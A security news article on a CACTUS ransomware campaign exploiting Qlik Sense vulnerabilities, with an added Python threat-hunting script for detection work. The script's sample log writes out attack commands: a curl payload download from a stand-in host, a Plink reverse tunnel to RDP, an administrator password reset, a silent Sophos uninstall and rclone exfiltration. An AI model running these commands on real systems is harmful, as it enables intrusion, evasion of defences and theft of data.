Cybersecurity researchers at Arctic Wolf have uncovered a large-scale CACTUS ransomware campaign exploiting recently disclosed vulnerabilities in Qlik Sense, a cloud analytics and business intelligence platform. The affected product is Qlik Sense Enterprise for Windows, the self-hosted edition.
According to Arctic Wolf, this is the first documented instance of threat actors exploiting Qlik Sense flaws for initial access, adding a new entry point to the ransomware playbook.
Exploiting Qlik Sense Vulnerabilities
Arctic Wolf, which responded to “several instances” of exploitation, believes the campaign targets three vulnerabilities disclosed in the past three months:
- CVE-2023-41265 (CVSS score: 9.9): An HTTP Request Tunneling flaw allowing remote attackers to elevate privileges and execute requests on the backend server.
- CVE-2023-41266 (CVSS score: 6.5): A path traversal vulnerability that lets an unauthenticated remote attacker generate an anonymous session and then send HTTP requests to unauthorized endpoints.
- CVE-2023-48365 (CVSS score: 9.9): An unauthenticated remote code execution flaw arising from improper validation of HTTP headers.
Notably, CVE-2023-48365 stems from an incomplete patch for CVE-2023-41265, so servers updated only against the original advisory remain exposed. The observed attacks chain these flaws with abuse of the Qlik Sense Scheduler service, which the intruders use to download and run additional tooling for persistence and remote control.
Tools of Exploitation
The threat actors leverage the Qlik Sense Scheduler service to download tools such as ManageEngine Unified Endpoint Management and Security (UEMS), AnyDesk, and Plink. Observed follow-on actions include uninstalling Sophos security software, changing the administrator account password, and creating RDP tunnels via Plink. The attack chains culminate in the deployment of CACTUS ransomware, accompanied by data exfiltration using rclone.
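The post-exploitation steps above (the Scheduler service pulling down tooling, Plink reverse tunnels to RDP, Sophos removal, administrator password changes, rclone exfiltration) are all visible in process-creation telemetry. The hunting heuristics below are an added example written for this article, not code from Arctic Wolf or Qlik. They run over constructed sample records in a simple `parent=…|image=…|cmd=…` format; the Scheduler service binary name `Scheduler.exe`, the exact command-line patterns, the file paths and the sample lines themselves are assumptions made for illustration, not indicators taken from the report.

```python
"""Hunting heuristics for the Qlik Sense / CACTUS post-exploitation tradecraft.

Added example, not Arctic Wolf's or Qlik's code. Each record is a process
creation event in the constructed form
    parent=<path>|image=<path>|cmd=<command line>
and is tagged with the tradecraft it resembles. The Qlik Sense Scheduler
binary name (Scheduler.exe), the flag patterns and all sample data are
assumptions for illustration.
"""
import re
from dataclasses import dataclass, field
from pathlib import PureWindowsPath


@dataclass
class ProcEvent:
    parent: str
    image: str
    cmd: str
    tags: list = field(default_factory=list)


EVENT_RE = re.compile(r"^parent=(?P<parent>[^|]+)\|image=(?P<image>[^|]+)\|cmd=(?P<cmd>.*)$")

# Assumed binary name of the Qlik Sense Scheduler service.
SCHEDULER_IMAGES = {"scheduler.exe"}
# Shells and download utilities a scheduler service has no business spawning.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "curl.exe", "bitsadmin.exe"}
# Tooling named in the campaign write-up.
REMOTE_TOOLS = {"anydesk.exe": "anydesk", "plink.exe": "plink", "rclone.exe": "rclone"}

PLINK_RDP = re.compile(r"-R\s+\S*:3389\b", re.I)          # remote port forward exposing RDP
RCLONE_REMOTE = re.compile(r"\b(copy|sync|move)\s+\S+\s+[A-Za-z][\w-]+:", re.I)  # local -> remote:
UNINSTALL_VERB = re.compile(r"(uninstall|/x\b|remove)", re.I)
ADMIN_PW_CHANGE = re.compile(r"\bnet1?(\.exe)?\s+user\s+administrator\s+(?!/)\S+", re.I)


def parse_event(line: str) -> ProcEvent:
    m = EVENT_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable record: {line!r}")
    return ProcEvent(m["parent"], m["image"], m["cmd"])


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path, e.g. 'scheduler.exe'."""
    return PureWindowsPath(path).name.lower()


def classify(ev: ProcEvent) -> list:
    """Append a tag for every heuristic the event matches and return the tags."""
    parent, image = _name(ev.parent), _name(ev.image)
    if parent in SCHEDULER_IMAGES and image in SHELLS:
        ev.tags.append("scheduler_spawned_shell")
    if image in REMOTE_TOOLS:
        ev.tags.append(f"tool:{REMOTE_TOOLS[image]}")
    if image == "plink.exe" and PLINK_RDP.search(ev.cmd):
        ev.tags.append("plink_rdp_tunnel")
    if image == "rclone.exe" and RCLONE_REMOTE.search(ev.cmd):
        ev.tags.append("rclone_exfil")
    if "sophos" in ev.cmd.lower() and UNINSTALL_VERB.search(ev.cmd):
        ev.tags.append("sophos_uninstall")
    if ADMIN_PW_CHANGE.search(ev.cmd):
        ev.tags.append("admin_password_change")
    return ev.tags


def hunt(lines) -> list:
    """Return only the events that matched at least one heuristic."""
    return [ev for ev in map(parse_event, lines) if classify(ev)]


# Constructed sample telemetry: two benign records followed by the attack chain.
SAMPLE_LOG = [
    r"parent=C:\Windows\System32\services.exe|image=C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe|cmd=Scheduler.exe",
    r"parent=C:\Windows\explorer.exe|image=C:\Windows\System32\cmd.exe|cmd=cmd.exe /c dir C:\Users",
    r"parent=C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe|image=C:\Windows\System32\cmd.exe|cmd=cmd.exe /c curl -o C:\ProgramData\ad.exe http://192.0.2.10/ad.exe",
    r"parent=C:\Windows\System32\cmd.exe|image=C:\ProgramData\plink.exe|cmd=plink.exe -R 0.0.0.0:33890:127.0.0.1:3389 user@192.0.2.10 -pw x",
    r"parent=C:\Windows\System32\cmd.exe|image=C:\Windows\System32\net.exe|cmd=net user administrator Winter2023!",
    r"parent=C:\Windows\System32\cmd.exe|image=C:\Windows\System32\msiexec.exe|cmd=msiexec.exe /x {PRODUCT-CODE} /qn Sophos Endpoint",
    r"parent=C:\Windows\System32\cmd.exe|image=C:\ProgramData\rclone.exe|cmd=rclone.exe copy C:\Shares\Finance mega:exfil --transfers 8",
    r"parent=C:\Windows\System32\cmd.exe|image=C:\ProgramData\AnyDesk.exe|cmd=AnyDesk.exe --install C:\ProgramData\AnyDesk --silent",
]

if __name__ == "__main__":
    for ev in hunt(SAMPLE_LOG):
        print(", ".join(ev.tags).ljust(40), ev.cmd)
```

The Scheduler-spawns-shell rule is the one worth deploying first: a Qlik service process launching `cmd.exe` or a download utility is rare in normal operation and fires before any ransomware or exfiltration tooling lands. The remaining rules are generic post-exploitation signals and will need tuning against legitimate administrative use of AnyDesk, Plink or rclone in a given environment.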
Despite governmental efforts to combat ransomware, the ransomware-as-a-service (RaaS) business model remains resilient. A separate report from blockchain analytics firm Elliptic and Corvus Insurance estimates that the Black Basta ransomware group has collected more than $107 million in Bitcoin ransom payments, and finds ties between Black Basta, the now-defunct Conti group, and the QakBot operation, pointing to a tangled web of cybercriminal affiliations.
As 2023 draws to a close, the year has set new records for ransomware activity: publicly disclosed attacks in the first six months rose 49% compared with the same period in 2022.